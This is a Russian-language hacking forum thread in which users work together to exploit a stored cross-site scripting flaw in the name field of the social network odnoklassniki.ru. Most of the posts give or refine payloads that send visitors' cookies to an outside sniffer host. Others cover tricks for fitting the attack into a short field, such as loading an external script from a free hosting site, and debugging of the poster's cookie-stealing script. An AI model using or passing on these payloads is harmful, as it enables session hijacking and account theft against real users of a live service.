![]() |
Итак наверно всем известно что на одноклассниках есть xss
но вот что делать если не помещается мой скрипт в отведенное мне поле?
|
мы экстрасенсы ? хсс в студию
|
<script>document.location='http://s.netsec.ru/andreya87.gif'+document.cookie</script>
|
Цитата:
|
например? всё равно не уместится...
|
А сколько символов ограничение? Вместо "document.location=", можно navigate('') попробовать. Короче получится.
|
умещается только <script>document.location='http://s.netsec.ru/andr
|
<script>navigate('http://s.netsec.ru/andreya87.gif и усё :cool:
|
как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить
|
мммм жаль....
|
Зарегь себе хост где нибуть и создай там *.js
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie'; потом создай index.html с содержанием: <script src="http://твой сайт/*.js"></script> должно прокатить |
А разбить на несколько запросов никак? Типа
Код:
<script>i="2"+document.cookie;/*Код:
<script>i="2"+document.cookie;/*Код:
*/alert(i);</script> |
<script src="http://megahackscript.ru/ploent.js"></script>
|
Цитата:
|
а сохранить страничку и ручками исправить ограничение поля на количество символов не прокатит?)) чё за хсс-то там..
|
xss на имени весит...измените имя и поробуйте написать у себя на форуме...
|
способ gramozeki не прокатывает,а способ на разбиение я считаю не уместным....может я не прав...
|
andrey_a87, ну ты попробуй :) А вообще то, что Basurman написал должно прокатить.
|
я делал фреймом , подсойденял скирипт, но всеравно, даже если оно и вместиться, то потом на форуме имя всеравно обрежут, тоесть для алерта места хватает, а для норм скрипта нет...
|
создай на сайте дж скрипт и скр его.
|
Цитата:
|
а про инфрейм это правильная мысль
|
а поподробнее можно про инфрейм, как это реализуется?
|
ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script> |
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши: alert("XSS"); и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал |
Цитата:
|
В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига.... |
а протокол не умещается написать)))))
|
Цитата:
|
хост дерьмовый, у него быввают заскоки.
|
Цитата:
1. нужно прописывать протокол http:// 2. кавычки как я понимаю там экранируются, не используй их 3. http://www.avlo.freevar.com/1.js не существует и вобще на этот сайт ругается Зарегай страничку на народе как я тебе сказал |
зарегил на народе.... alvo150.narod.ru
index.html ______ <script src="http://www.alvo150.narod.ru/1.js"></script> 1.js ____ document.location='http://s.netsec.ru/andreya87.gif'+document.cookie'; Когда захожу на http://www.alvo150.narod.ru то не перекидывает меня на 1.js... Просмотр исходного <script src="http://www.alvo150.narod.ru/1.js"></script><!-- ><!-- "><!-- '><!-- --></textarea></form> </title></comment></a> </div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font> <style> #bn {display:block;} #bt {display:block;} </style> <div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div> <script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script> <!-- mailto:spm111@yandex.ru --> |
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;
|
ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru
|
Цитата:
У тебя там написано: Код:
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie';Сделай так: Код:
document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;Да и вообще, лучше взять в привычку - перед тем как тестировать что либо удалённо, проверить скрипты на локальной тачке. |
выдал такую ошибку :
Код:
500 Servlet Exceptionмб кому-то поможет |
| Время: 06:31 |